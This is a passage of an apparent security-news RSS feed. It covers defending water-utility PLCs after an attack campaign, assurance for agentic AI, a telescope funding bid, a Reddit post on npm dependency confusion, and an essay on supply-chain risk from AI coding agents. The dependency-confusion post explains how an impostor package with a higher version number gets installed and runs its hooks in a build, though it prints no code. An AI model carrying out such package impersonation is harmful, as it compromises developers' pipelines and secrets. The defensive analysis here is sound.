<li><strong>Your integrator is part of your attack surface. </strong>If a shared systems integrator or communications architecture connected the victims, the unit of compromise is not the utility — it is the integrator’s customer fleet. Ask yours which other customers share your remote-access design.</li>



<li><strong>Recovery is not resilience. </strong>Braham was back in roughly two hours; Plymouth ran manually while cellular links were rebuilt. Time-to-manual is a testable metric, not an assumption. Test it.</li>



<li><strong>The first hardening steps are configuration, not procurement. </strong>RUN mode at the keypad, the strongest password protection the firmware supports, HTTP server off, no public IP. The gap exposed in Minnesota is not knowledge. It is execution order under pressure.</li>
</ul>



<h2 class="wp-block-heading">The asymmetry nobody is naming</h2>



<p class="wp-block-paragraph">The most consequential sentence of the past week is buried in <a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1790.html">Rockwell’s July 30 notice SD1790</a>. It is not a vulnerability disclosure — there is no CVE. The attackers did not exploit a flaw; they used the controller’s intended functionality. Changing an IP address is an administrative operation, and setting a password is a security feature — the malicious element was never the command, only who issued it, from where and against which physical process. What SD1790 actually is, is a recovery procedure for operators locked out of their own MicroLogix 1400s: Power the controller off, disconnect the battery, power-cycle into a fault state, reconnect. That sequence erases the program, the data and the IP configuration. Then, the notice says, redownload your project file.</p>



<p class="wp-block-paragraph">That instruction presumes you have one. Current. Offline. Matching what actually runs in the field after fifteen years of undocumented tweaks by three generations of technicians and two integrators. In my project work across energy and manufacturing, that assumption fails more often than any firewall — in one plant assessment, the only person who could have restored a controller had left the integrator two years earlier, and the project file left with him.</p>



<p class="wp-block-paragraph">Now cross-reference the federal advisory. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a">AA26-097A</a> has tracked this campaign since March; its July 22 update expanded the target set beyond Rockwell to Schneider Electric and Siemens devices, documented exfiltration of PLC project files for the first time and added detection guidance for manipulated reusable code modules embedded in PLC programs. No one has publicly confirmed exfiltration at the Minnesota utilities themselves — which is exactly why it belongs in your planning assumptions rather than your press statements. Read those two documents together and the strategic picture inverts: An adversary who may be able to study — or quietly modify — control logic that the owner cannot even restore.</p>



<p class="wp-block-paragraph">The countermeasure costs nothing but discipline. Treat control logic like source code. Every controller gets an offline, versioned, hash-verified project archive. Verification means uploading the running program and comparing it against the archive — not assuming the file on the engineering laptop is current. And widen the definition of backup: A rebuild-ready package includes firmware versions, HMI configuration, I/O lists, the vendor software with valid licenses, the right cable and a record of the last authorized change. <a href="https://doi.org/10.6028/NIST.SP.1339">NIST’s OT Backup Quick Start Guide, SP 1339</a>, published in June, makes the same point in two pages: Create, test and review backups inside change management — otherwise they are storage, not capability. Schedule it like instrument calibration, not like an IT backup job, because that is the operational category it belongs to.</p>



<h2 class="wp-block-heading">You can’t Shodan a SIM</h2>



<p class="wp-block-paragraph">One detail from the investigation deserves more attention than it received: Researchers scanning Minnesota’s public IP space found little obviously exposed water infrastructure. One plausible explanation, offered by researchers quoted in the initial coverage, is that many of these utilities communicate over cellular links — Plymouth’s disconnection of cellular-connected equipment confirms at least part of that picture — and cellular paths are far harder to enumerate from outside than internet-facing systems.</p>



<p class="wp-block-paragraph">Operators have drawn comfort from the wrong conclusion. Cellular opacity did not protect the victims; it merely hid the exposure from everyone, including themselves. If a security researcher cannot see your cellular attack surface, neither can your own assessment — and that is precisely the population that got hit.</p>



<p class="wp-block-paragraph">There is a mundane fix, and it is the one I run in my own asset-inventory workshops: Pull the carrier bill. Every modem generates an invoice line whether or not it appears on any diagram, and the invoice regularly surfaces devices that three network revisions missed. Reconcile every SIM against a named device, a named owner and a documented purpose. <a href="https://www.cisa.gov/news-events/alerts/2026/07/30/cisa-urges-water-and-wastewater-systems-sector-protect-ot-against-activity-targeting-plcs">CISA’s July 30 alert</a> told water utilities to check for undocumented cellular modems installed by operators, vendors or system integrators — and the word undocumented is the tell: The agency assumes your architecture diagram is wrong. Then move what remains behind a private APN or VPN termination, strip every public IP and port-forwarding rule and restrict management access to known engineering workstations.</p>



<h2 class="wp-block-heading">Your integrator is your blast radius</h2>



<p class="wp-block-paragraph">The distributed character of this campaign is its most important feature. Dozens of geographically clustered utilities, hit in a two-day window, with neighboring infrastructure apparently untouched, points toward some common technical thread — a shared systems integrator, a shared communications architecture, a shared remote-access design.</p>



<p class="wp-block-paragraph">If that hypothesis holds, the defensive unit is no longer the individual utility. It is the integrator’s customer fleet. A standing vendor tunnel, replicated with the same design across forty small customers, converts one compromised contractor into forty compromised water systems.</p>



<p class="wp-block-paragraph">Here are the three questions I put to integrators in my own projects — ask yours this week: Which of your other customers share my remote-access architecture? Who at your firm can reach my controllers today, and are those individual identities or a shared account? Can I pull the session logs myself? Then change the model: Replace standing tunnels with just-in-time access — request-scoped, time-boxed, individually authenticated with a second factor, brokered through a jump host you control, recorded. And put a notification clause in the contract: If the integrator is compromised, you hear about it in hours, not from the FBI.</p>



<h2 class="wp-block-heading">Minnesota’s fast recoveries were earned, not lucky</h2>



<p class="wp-block-paragraph">Braham’s water plant was back under operator control in roughly two hours, with no boil-water order. Plymouth’s operators switched to manual operation and disconnected the compromised cellular equipment at two water towers and fourteen lift stations, keeping service running until communications were restored. None of that was produced by a security product; it was produced by operating capability that existed before the attack needed it. Restoring the screens is not the finish line, either: After an unauthorized hand has changed a controller’s configuration, the first recovery question is not whether the HMI is back online but whether you can trust what it is telling you — which means verifying levels, pressures and pump states against local indicators before the display regains its authority.</p>



<p class="wp-block-paragraph">Manual operation is a designed capability, not a folk memory. It requires procedures that exist on paper — literally on paper, because the HMI may be what you just lost — people trained on them, and decision rights assigned in advance. The sector had, in fact, just rehearsed this: <a href="https://www.epa.gov/cyberwater/epa-2026-national-cyber-drill">EPA’s 2026 National Cyber Drill</a> on July 8 — 18 days before Minnesota — put utilities through precisely that scenario, operating with SCADA remote connectivity, cloud services and communications degraded or unavailable. Whether that capability actually exists at your site is testable: I’ve published a free, browser-based <a href="https://sabinefroemling-tech.github.io/island-mode-72h-stresstest/?lang=en">Island Mode 72-hour stress test</a> — one of six no-signup companion tools I maintain openly on GitHub — that walks a site through exactly this question, from credential caches to offline backups. Joint guidance issued by CISA with its Australian, British and Canadian counterparts in late July makes the same point at doctrine level: Maintain isolation and recovery plans so essential services continue under degraded conditions, through manual or alternative SCADA paths.</p>



<p class="wp-block-paragraph">The decision-rights half is the part most plans skip. Which systems may a SOC or an MSSP isolate unilaterally, and which require the operator who understands the process? That is <a href="https://www.csoonline.com/article/4200141/the-containment-paradox-why-your-ransomware-playbook-has-the-wrong-people-in-charge.html">the containment paradox</a> I wrote about in these pages two weeks ago, and the water-sector version is identical: The artifact is one page, the conversation that produces it takes an afternoon, and the absence of it is what turns a two-hour incident into a two-day one.</p>



<h2 class="wp-block-heading">The response calendar</h2>



<p class="wp-block-paragraph"><strong>Within 72 hours:</strong> Kill every direct external path and public IP, pull the carrier bill and flag every SIM you cannot map to a device, preserve gateway and engineering-workstation logs, verify the physical process against local indicators and upload the running logic from each critical controller to compare against your archive.</p>



<p class="wp-block-paragraph"><strong>Within 30 days:</strong> Finish the SIM-to-asset reconciliation, rotate every credential that ever traveled through an exposed path, give every third party an individual identity with session logging and assemble a rebuild-ready package — project file, firmware version, HMI configuration, software, cable — for each critical controller.</p>



<p class="wp-block-paragraph"><strong>Within one quarter:</strong> Run a factory-reset recovery drill on a representative controller, measure time-to-manual in a live exercise, replace the last standing vendor tunnel with just-in-time access, put the notification clause into integrator contracts and get the containment matrix — who may isolate what — signed.</p>



<h2 class="wp-block-heading">5 numbers to know by Friday</h2>



<ol class="wp-block-list">
<li>SIM-equipped OT endpoints on your carrier invoice versus devices in your asset register. Any delta is unmanaged attack surface.</li>



<li>Controllers still running default, blank or shared passwords. After this month, that number is a decision, not an oversight.</li>



<li>Days since the last verified offline project-file backup, per controller. Verified means uploaded and compared — not assumed.</li>



<li>Tested time-to-manual, per site. Measured in a drill, with the people actually on shift, not estimated in a workshop.</li>



<li>Third parties with standing access paths into your OT. The target is zero. Everything else becomes just-in-time.</li>
</ol>



<p class="wp-block-paragraph">Attribution may firm up, or the ambiguity may itself be the point — it serves the attacker either way. The five numbers above will not tell you who attacked Minnesota. They tell you how much room the next attacker has inside your plant. The next campaign gets to learn from this one. Attribution can wait. Your exposure math cannot.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI assurance gap: CIOs need proof that agentic AI controls actually work]]></title>
<description><![CDATA[Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category: systems that interpret instructions, call tools and act across workflows without a mature assurance model built around them.



In my work as a leader and investor across technology-enab...]]></description>
<link>https://tsecurity.de/de/3702654/it-security-nachrichten/the-ai-assurance-gap-cios-need-proof-that-agentic-ai-controls-actually-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702654/it-security-nachrichten/the-ai-assurance-gap-cios-need-proof-that-agentic-ai-controls-actually-work/</guid>
<pubDate>Tue, 04 Aug 2026 11:03:49 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category: systems that interpret instructions, call tools and act across workflows without a mature assurance model built around them.</p>



<p class="wp-block-paragraph">In my work as a leader and investor across technology-enabled businesses, I have spent years around automation, cybersecurity, compliance, workflow design and board reporting. I have watched management teams gain confidence from dashboards, policies and approval records, then face a harder question when a board member, auditor or regulator asks whether the controls performed as intended.</p>



<p class="wp-block-paragraph">Agentic AI complicates that question because a single outcome may pass through several systems. An agent can collect information, choose a tool, produce code, route a request and hand work to another agent before a person approves the result. No single manager may have observed the full path.</p>



<p class="wp-block-paragraph">Executive accountability remains human even when the operating activity becomes more autonomous. The CIO may have to explain who authorized the activity, whether the agent stayed within its approved purpose and what evidence supports management’s answer.</p>



<p class="wp-block-paragraph">In a recent<a href="https://x.com/demishassabis/status/2076957440109625718"> </a><a href="https://x.com/demishassabis/status/2076957440109625718">framework for frontier AI</a>, Google DeepMind CEO Demis Hassabis proposed an independent standards body that could evaluate advanced models before deployment and address critical vulnerabilities after release. His proposal focuses on frontier models, but the principle carries into the enterprise: expanding autonomy creates a corresponding need for independent assessment.</p>



<p class="wp-block-paragraph">My rule for this stage of adoption is straightforward: no agent should gain more autonomy than the company can verify.</p>



<h2 class="wp-block-heading"><a></a>The enterprise audit model was built for people and software</h2>



<p class="wp-block-paragraph">Companies have spent decades building controls around people. Employees have job descriptions, reporting lines, approval limits and access rights. When someone leaves, an established process removes access and transfers responsibility.</p>



<p class="wp-block-paragraph">Traditional software also fits a familiar structure. A program follows defined instructions inside systems with owners, release procedures, test records and change controls. Complexity can make review difficult, but the accountability chain is usually visible.</p>



<p class="wp-block-paragraph">An AI agent sits between those categories. It operates through software while interpreting instructions with room to choose a path. Its behavior may change when the model, prompt, connected data, available tools or surrounding workflow changes. A control approved during deployment can weaken months later without an obvious change to the application.</p>



<p class="wp-block-paragraph">Standards are still developing as adoption accelerates. In February 2026, NIST launched an ⁠<a href="https://www.nist.gov/artificial-intelligence/ai-agent-standards-initiative">AI Agent Standards Initiative</a> focused on secure operation and interoperability for agents capable of autonomous action.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/scaling-integration.png?w=1024" alt="Graph: Gartner outlook: Scaling integration against delivery failure risks." class="wp-image-4204558" width="1024" height="520" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">Gartner predicted that 40% of enterprise applications would include task-specific agents by the end of 2026, up from less than 5% in 2025. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">More than 40% of agentic AI projects could be canceled by the end of 2027</a> because of escalating cost, unclear business value or inadequate risk controls.</p>



<p class="wp-block-paragraph">IBM’s 2025 Cost of a Data Breach research found that ⁠<a href="https://newsroom.ibm.com/2025-07-30-ibm-report-13-of-organizations-reported-breaches-of-ai-models-or-applications%2C-97-of-which-reported-lacking-proper-ai-access-controls">13% of surveyed organizations reported breaches involving AI models or applications</a>. Among that group, 97% reported inadequate AI access controls. 63% of organizations in their study lacked governance policies for managing AI or preventing shadow AI.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/vulnerability-vector.png?w=1024" alt="Vulnerability vector: AI security controls under pressuer." class="wp-image-4204557" width="1024" height="579" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">One team may approve an agent, another may connect it to data and a third may own the workflow. Management still carries responsibility when the agent exposes information, produces an error or acts outside its approved purpose.</p>



<p class="wp-block-paragraph">Two-thirds of CIOs and CTOs surveyed were being held ⁠<a href="https://www.cio.com/article/4182288/cios-are-being-held-accountable-for-ai-they-dont-fully-control-ibm-study-finds.html">accountable for AI systems they did not fully control</a>. Seventy percent said technology was spreading across the business faster than IT could track it, while 77% said adoption was outpacing governance capabilities.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/cio-autonomy-gap.png?w=1024" alt="The CIO autonomy gap: Sentiment grid." class="wp-image-4204556" width="1024" height="504" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">The survey findings expose the boardroom gap: management carries accountability while control remains distributed across teams, systems and workflows. An assurance model must provide more than a statement of intent.</p>



<h2 class="wp-block-heading"><a></a>Assurance must prove where the boundary held</h2>



<p class="wp-block-paragraph">Policies, dashboards and logs help establish control. Assurance begins when the company tests whether an agent stayed inside the conditions management approved.</p>



<p class="wp-block-paragraph">Before deployment, management should document the agent’s business purpose, accountable owner, systems touched, allowed actions and stop conditions. Testing should then determine whether the agent can reach information outside its scope, call an unapproved tool, continue after a stop condition or carry an incorrect assumption into another system.</p>



<p class="wp-block-paragraph">I would treat an agent’s autonomy as a renewable license because its operating condition will change after launch. Renewal should follow any material change to the model, connected data, available tools, workflow or authority. NIST’s work on the<a href="https://www.nist.gov/news-events/news/2026/03/new-report-challenges-monitoring-deployed-ai-systems?utm_source=chatgpt.com"> </a><a href="https://www.nist.gov/news-events/news/2026/03/new-report-challenges-monitoring-deployed-ai-systems?utm_source=chatgpt.com">challenges of monitoring deployed AI systems</a> identifies drift, fragmented logging and immature standards as barriers to post-deployment oversight, while the World Economic Forum recommends<a href="https://www.weforum.org/publications/ai-agents-in-action-foundations-for-evaluation-and-governance/?utm_source=chatgpt.com"> </a><a href="https://www.weforum.org/publications/ai-agents-in-action-foundations-for-evaluation-and-governance/?utm_source=chatgpt.com">scaling safeguards with an agent’s autonomy, authority and complexity</a>. A change-triggered review ties assurance to the version of the agent and workflow in use, giving the CIO a defensible basis for continued authority.</p>



<p class="wp-block-paragraph">Consider a coding agent that begins by drafting test cases, then gains access to repositories, tickets, CI/CD tools and production documentation. A production change could involve an instruction, code, a tool call, an automated test, a ticket update and human approval. Assurance must show how the result was produced, which systems participated, whether the agent crossed a boundary and how exceptions were handled.</p>



<p class="wp-block-paragraph">For every agent with meaningful operating authority, I would expect four connected records: the approved baseline, boundary-test results, a history of behavioral drift and an account of exceptions and interventions. Together, they give management a record that can support a board discussion, audit or regulatory response without depending on the technical team’s memory.</p>



<h2 class="wp-block-heading"><a></a>Autonomy should scale only as fast as assurance</h2>



<p class="wp-block-paragraph">Internal teams will remain responsible for designing controls and operating the environment. At board-level scale, management also needs review independent from the people who built and run the agent.</p>



<p class="wp-block-paragraph">I have seen management ask auditors or other independent certified professionals to sign off on a system. They cannot sign when they have not completed the work required to support that opinion. Leadership wants confidence, the board wants an answer and the independent party needs a body of evidence that can be tested.</p>



<p class="wp-block-paragraph">Agentic AI will make that evidence harder to assemble after an incident. Records have to be produced while the work occurs. Once an agent has acted across several systems, reconstruction may depend on logs created by different vendors, teams and tools. Missing context can turn a clear technical event into an uncertain management explanation.</p>



<p class="wp-block-paragraph">CIOs should design assurance into the workflow. The operating record needs to capture approved purpose, tested boundaries, material changes, exceptions, human interventions and unresolved findings. Independent review can then examine whether the control operated during the period management is being asked to discuss.</p>



<p class="wp-block-paragraph">The operating record gives executives a basis for changing an agent’s authority. Broader responsibility should follow tested boundaries and a clean exception history. Drift or repeated intervention should pause expansion until the cause is understood.</p>



<p class="wp-block-paragraph">Before approving broader use, I would ask:</p>



<ul class="wp-block-list">
<li>What authority has the company granted?</li>



<li>Which tests show the boundary holds?</li>



<li>What record will remain available months later?</li>



<li>Who carries accountability when the record shows a failure?</li>
</ul>



<p class="wp-block-paragraph">Those questions create a management standard for deciding whether an agent is ready to move from a limited workflow into broader enterprise operations.</p>



<p class="wp-block-paragraph">Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category that requires its own assurance model. The next discipline for the enterprise is auditing autonomy through approved behavior, tested boundaries, monitored change and documented intervention.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spain Offers $1.14 Billion To Get Thirty Meter Telescope Moved To Canary Islands]]></title>
<description><![CDATA[Longtime Slashdot reader schwit1 shares a report from Behind the Black: In a new bid to get the Thirty Meter Telescope (TMT) to move from Hawaii, which has blocked its construction for more than a decade, the Spanish government has put together a $1.14 billion package that would not only pay for ...]]></description>
<link>https://tsecurity.de/de/3702456/it-security-nachrichten/spain-offers-114-billion-to-get-thirty-meter-telescope-moved-to-canary-islands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702456/it-security-nachrichten/spain-offers-114-billion-to-get-thirty-meter-telescope-moved-to-canary-islands/</guid>
<pubDate>Tue, 04 Aug 2026 09:12:45 +0200</pubDate>
<content:encoded><![CDATA[Longtime Slashdot reader schwit1 shares a report from Behind the Black: In a new bid to get the Thirty Meter Telescope (TMT) to move from Hawaii, which has blocked its construction for more than a decade, the Spanish government has put together a $1.14 billion package that would not only pay for construction on the Canary Islands, but would finance an additional half century of operations. Tech Times provides some additional details: The package is conditional on the TMT International Observatory formally choosing La Palma as its construction site. The financing architecture has three pillars and two additional contingent instruments. The first pillar is 400 million euros (approximately $456 million USD) from Spain's Ministry of Science, Innovation and Universities, routed through the Centre for Technological Development and Innovation (CDTI). This figure was first pledged a year ago in July 2025 as Spain's initial bid.
 
The second pillar is a 300 million-euro (approximately $342 million USD) loan from the EIB [European Investment Bank] itself -- subject to satisfactory completion of the bank's technical, financial, and legal due diligence and approval by its governing bodies.
 
The third is a potential 300 million-euro (approximately $342 million USD) participation from the Instituto de Credito Oficial (ICO), Spain's state development finance institution, evaluated under equivalent conditions to the EIB loan but subject to its own separate analysis. Spain's export credit agency, Cesce, may also provide coverage instruments, and the EIB has left open the possibility of expanding its support through intermediated financing mechanisms or guarantees.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Spain+Offers+%241.14+Billion+To+Get+Thirty+Meter+Telescope+Moved+To+Canary+Islands%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F08%2F04%2F0040200%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F08%2F04%2F0040200%2Fspain-offers-114-billion-to-get-thirty-meter-telescope-moved-to-canary-islands%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/08/04/0040200/spain-offers-114-billion-to-get-thirty-meter-telescope-moved-to-canary-islands?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dependency Confusion Still Works. Here's Why Your Tools Miss It]]></title>
<description><![CDATA[May Microsoft alert dropped 45 malicious npm packages targeting dev environments. 33 in the first wave, 12 more the next day. Dependency confusion. Same attack Alex Birsan pulled off back in 2021. Still works. Still gets past everything. Not because it's clever. Because of what your tools actuall...]]></description>
<link>https://tsecurity.de/de/3702101/malware-trojaner-viren/dependency-confusion-still-works-heres-why-your-tools-miss-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702101/malware-trojaner-viren/dependency-confusion-still-works-heres-why-your-tools-miss-it/</guid>
<pubDate>Tue, 04 Aug 2026 04:20:40 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>May Microsoft alert dropped 45 malicious npm packages targeting dev environments. 33 in the first wave, 12 more the next day. Dependency confusion. Same attack Alex Birsan pulled off back in 2021.</p> <p>Still works. Still gets past everything.</p> <p>Not because it's clever. Because of what your tools actually do.</p> <p><strong>SCA scanner sees a new package?</strong> It's comparing against a database of known bad stuff. A brand new public impostor isn't in that database yet, there's nothing to match against, gets flagged clean, installs without a second look.</p> <p><strong>Lockfile pinned to the right version? Fine, until someone adds a new dependency, or pins to latest, or a fresh install runs before the lockfile gets committed.</strong> That's when the resolver sees your private package name sitting on both a private and public registry, compares versions, picks the highest. Attacker published 9.9.9. Lockfile writes it down as legit on the next run like nothing happened.</p> <p><strong>Post-build scanning is just forensics at that point.</strong> Package already fetched. Install hooks already ran, with whatever access that grants inside the pipeline. You're not catching the attack, you're documenting it after the fact.</p> <p><strong>What actually stops it:</strong> Claim your internal package names on public registries first. Even empty placeholders work. An attacker can't register a name you already own.</p> <p>Scope your internal packages, <a href="https://www.reddit.com/u/yourcompany">u/yourcompany</a>, mapped to your private registry only. Get the config right and scoped names never resolve against public npm.</p> <p>Watch your build-time network traffic. Internal package name pulling from a public source? Block it before the fetch happens. That's the actual moment this fails or succeeds.</p> <p>That last one's the real fix honestly. Dependency confusion works because your build resolves names in the dark and trusts whatever comes back. Give it visibility into where each dependency is actually coming from and the whole attack falls apart.</p> <p>Curious how everyone else is catching this one. Or is your team still trying to get the config perfect across every project and registry forever?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DavidPulaski"> /u/DavidPulaski </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1veszfs/dependency_confusion_still_works_heres_why_your/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1veszfs/dependency_confusion_still_works_heres_why_your/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three AI security mistakes that will haunt enterprises]]></title>
<description><![CDATA[There is a lot of talk about the coming enterprise AI reality, in which AI finally arrives in production systems. You might not know it, but this reality—or nightmare, depending on how you handle it—is already happening.



It all starts with a “pilot,” a “prototype,” or a “side project.” Maybe s...]]></description>
<link>https://tsecurity.de/de/3702093/ai-nachrichten/three-ai-security-mistakes-that-will-haunt-enterprises/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702093/ai-nachrichten/three-ai-security-mistakes-that-will-haunt-enterprises/</guid>
<pubDate>Tue, 04 Aug 2026 04:13:14 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There is a lot of talk about the coming enterprise AI reality, in which AI finally arrives in production systems. You might not know it, but this reality—or nightmare, depending on how you handle it—is already happening.</p>



<p class="wp-block-paragraph">It all starts with a “pilot,” a “prototype,” or a “side project.” Maybe someone builds an internal dashboard with an agent. The dashboard quickly becomes indispensable, and all of a sudden the experiment becomes production. Along the way, no one thought to ask the boring, inconvenient questions: What exactly was pulled from npm, PyPI, or Docker Hub? How is (or was) authentication configured? Is anyone watching for supply chain attacks against the tools and libraries the agents chose?</p>



<p class="wp-block-paragraph">And it’s not just a one-off project here or a couple of applications there. AI is enabling organizations to generate more code and ship more products and projects, more quickly, than ever before. By the time security teams get a look, the business is hooked and there’s no turning back. An actual nightmare has begun.</p>



<p class="wp-block-paragraph">There are three major problems that make the nightmare real. </p>



<h2 class="wp-block-heading">Components you never explicitly chose</h2>



<p class="wp-block-paragraph">When you ask an AI agent to build an app, it doesn’t just spit out a single script. It quietly assembles an entire ecosystem around whatever problem you’ve described to it. It pulls in a web framework, grabs a bunch of libraries, stands up databases, and then it potentially builds everything on dependencies in container images.</p>



<p class="wp-block-paragraph">From a productivity perspective, this is awesome. However, from a security standpoint, it’s worrisome, to say the least. When I’ve built apps like this myself, I couldn’t begin to tell you all of the components that were being used unless I went back and asked the agent to explain itself.</p>



<p class="wp-block-paragraph">We live in a world where anyone can publish to npm or PyPI, and we’ve seen attackers slip malicious packages into those ecosystems or compromise ones that are widely used. Some of the recent incidents have involved security and devops tools themselves pulling a compromised dependency, running it as part of CI/CD with elevated privileges, and quietly exfiltrating secrets or tampering with builds. I personally experienced this type of compromise a couple of months ago, and had to update all of my credentials in GitHub.</p>



<p class="wp-block-paragraph">Pulling unvetted code is bad; now layer AI agents on top of that. They default to whatever is easiest to discover and integrate. If a package solves a problem in front of the agent, the agent will add it. This is the old “download a random library from the Internet” problem, but now it’s on autopilot, at scale, and moving at a pace we’ve never seen before.</p>



<p class="wp-block-paragraph">To solve this problem, we must provide the agents with an innate sense of our risk tolerance, an approved components list, our desires around logging, etc. We can do this with spec files and what the industry calls constitutions. Collectively, this is called harness engineering, which we will talk more about later.</p>



<h2 class="wp-block-heading">Skills shifting from code to architecture</h2>



<p class="wp-block-paragraph">There has been a lot of hand-wringing about <a href="https://www.infoworld.com/article/4065771/why-we-need-junior-developers.html" data-type="link" data-id="https://www.infoworld.com/article/4065771/why-we-need-junior-developers.html">whether junior developers</a> will ever <a href="https://www.infoworld.com/article/4152683/what-next-for-junior-developers.html" data-type="link" data-id="https://www.infoworld.com/article/4152683/what-next-for-junior-developers.html">really learn to code</a> if AI is doing all of their coding for them.</p>



<p class="wp-block-paragraph">That’s not what worries me.</p>



<p class="wp-block-paragraph">I think it’s fine to let an agent spit out code. It’s a job they are really good at. What they are not really good at is identifying and avoiding problems in code.</p>



<p class="wp-block-paragraph">I haven’t written code in quite some time. I can, but it doesn’t make sense for me to do so. What is worth my while is noticing when an agent suggests something dumb or even dangerous (or both).</p>



<p class="wp-block-paragraph">For example, while working on a recent personal project, an agent proposed exposing a memory server on the public Internet with no authentication. The agent wired things up so smoothly that, at first glance, everything looked fine and just worked. But then I paused and asked, “Wait, how is this actually authenticating? Where’s the password, secret token, or OAuth in this flow?” Turns out it wasn’t authenticating and there was no password. If I hadn’t taken that beat—and then argued with the agent for a while—the app would have gone live with no protection.</p>



<p class="wp-block-paragraph">So, the skills issue isn’t about whether we will lose the ability to code but rather whether we have the ability to ask questions and be discerning, and whether we have the understanding to know when something doesn’t look or even feel right. Do organizations have people who know what a dangerous software pattern looks like when the agent suggests it? You need people who can recognize when an authentication flow is too permissive, when a data store should never be exposed beyond a certain boundary, and when an architecture has become such a steaming pile of technical debt that the right answer is to throw away a whole layer and rebuild it.</p>



<p class="wp-block-paragraph">You need people who know that “what works” isn’t the same as “what’s safe” or “what’s right” and who can argue back with the agent when the former doesn’t line up with the latter.</p>



<p class="wp-block-paragraph">It’s not about syntax. It’s about architecture, supply chain awareness, and the willingness to say, “We’re tearing this down and doing it right,” even when the prototype looks good on the surface. Teach your AI-assisted coders basic security principles, basic architectural patterns. The AI will teach them the more advanced stuff, as long as they keep asking questions.</p>



<h2 class="wp-block-heading">Agents with no harness</h2>



<p class="wp-block-paragraph">The third problem is that we’ve unleashed some very capable agents into our development workflows without treating them like first-class actors that need governance.</p>



<p class="wp-block-paragraph">Many organizations are wiring AI assistants into a repo or IDE and letting them scaffold projects and pipelines. Maybe they bolt on a security scanner and declare “AI enablement.” That’s not a governance model, that’s optimism (and not even cautious optimism).</p>



<p class="wp-block-paragraph">Indeed, a code-generating agent with broad access to your repos, your CI/CD pipeline, and your artifact registries is effectively a hyper-productive and not-very-well-trained junior developer with access to the Internet and no ingrained sense of organizational policies. It can introduce new tools, new dependencies, and new patterns faster than your review processes can handle.</p>



<p class="wp-block-paragraph">In my personal projects, I’ve started to think of this as what AI coders call a harness-engineering problem. For every agent that’s responsible for building or wiring code, I try to put other agents in the loop that are responsible for tearing it down, at least conceptually. For example, one agent focuses on security and looks for obvious vulnerabilities and bad practices. Another looks at architecture and points out when the app design is veering into unmaintainable territory. A third looks at performance and reliability issues, which are themselves a kind of security concern when you think about things like denial of service and resource exhaustion. Pair this with constitutions that give the agents first principles on architecture, security, and design, and this is no longer vibe coding, it’s harness engineering at scale for all of your projects.</p>



<p class="wp-block-paragraph">What I am doing isn’t perfect; there is no perfect in this space, because these are non-deterministic, statistical tools. But, many organizations aren’t even doing this. In effect, their agents are freelancing. They’re vibe coding. They’re not constrained to trusted registries or hardened base images. They’re not required to log their decisions in a way that security can audit. No one owns the harness, and that means a lot of implementation decisions have fully shifted from humans to systems that no one is really watching.</p>



<h2 class="wp-block-heading">New problems require new thinking</h2>



